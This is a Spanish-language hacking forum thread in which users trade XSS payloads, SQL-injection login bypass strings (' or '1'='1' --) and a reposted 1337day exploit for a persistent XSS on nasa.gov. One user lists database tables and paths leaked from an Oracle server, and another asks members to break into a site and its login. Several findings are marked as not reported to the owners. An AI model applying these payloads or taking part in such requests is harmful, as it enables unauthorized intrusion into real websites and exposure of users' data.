Tiene un XSS
Solo tienes que injectar este codigo
en contacto en firefox brinca la alerta en google chorome no te la brica no es mentira cress que voy perder mi tiempo?
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
No estoy muy puesto en Java y menos en servlets... pero parece que intenta usar una variable de SESSION que no está definida ('matricula'). Así que para poder inyectar algo, deberías modificar el objeto de sesión, a lo cual mis conocimientos no llegan.. jeje según mi opinión, tal como tu comentas es 'inofensivo'.adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
Salu2!
[ Lo importante no es el final, sino el camino recorrido ]
Pues paarte de darte un monton de informacion no le veo problema! Almenos que busques en la misma web donde puedas utilizar los datos para hacer un query!
1337 & culture!
Estuve mirando no solo en esa aplicacion, si no otras en ese servidor. y resulta que tiene una vulnerabilidad,adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
una inyeccion sql por POST pero parece que filtra las comillas simples poniendote otra seguida
es un servidor oracle y solo pude sacar esto a nivel web:
Oracle, Apache, windows
alumnos_sinconcluir
Matricula,nombre,total,ciclo
V_social
matricula, nombre, division, nombrediv, carrera, nombrecar, iciclo
D:\Archivos de programa\Apache Group\Apache2\htdocs\servicio_social\index.cfm
Salu2!
(cuanto más sabes, más cuenta te das de lo poco que sabes).
Código: Seleccionar todo
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| NASA.GOV - Cross Site Scripting Persistent |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date : 21-08-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Vendor : NASA
# Category : misc
# URL Vendor : http://www.nasa.gov/
# Tested on : BackTrack 5 r3 - Mozilla Firefox
# Contact : [email protected]
# Website : www.calebbucker.blogspot.com
# Greetings to : CL-Security All Members
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
http://img341.imageshack.us/img341/4395/snapshot408.png
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
VULNERABILITY LOCATION:
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CROSS SITE SCRIPTING:
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
HOW TO USE:
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
so double encoded it will look like this:
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Enjoy!
# 1337day.com [2012-08-22]
Gracias, hace tiempo saqué uno también.
Juder... que buena TioSam/CalebBucker xD
Estos de la Nasa no aprenden ni a base de tortas
Estos de la Nasa no aprenden ni a base de tortas
[ Lo importante no es el final, sino el camino recorrido ]
Como quedan los gilipollas que hablan tras las espaldas
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
h4x0r...Ti0Sam escribió:Como quedan los gilipollas que hablan tras las espaldas
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
user: ' or '1'='1' -- '
pass: ' or '1'='1' -- '
[Enlace externo eliminado para invitados]
user: ' or '1'='1' -- '
pass: ' or '1'='1' -- '
hola amigos ustedes que son buenos para estas cosas, que podrian hacer con esta web: [Enlace externo eliminado para invitados]
Y este login: [Enlace externo eliminado para invitados]
Gracias de antemano a todos los que le intenten meter mano a esto se les agradeceria enormemente, gracias amigos
Y este login: [Enlace externo eliminado para invitados]
Gracias de antemano a todos los que le intenten meter mano a esto se les agradeceria enormemente, gracias amigos
Web : [Enlace externo eliminado para invitados]
Error : [Enlace externo eliminado para invitados]
Método Utilizado : XSS
Descubridor : Deck
No Reportado
Error : [Enlace externo eliminado para invitados]
Método Utilizado : XSS
Descubridor : Deck
No Reportado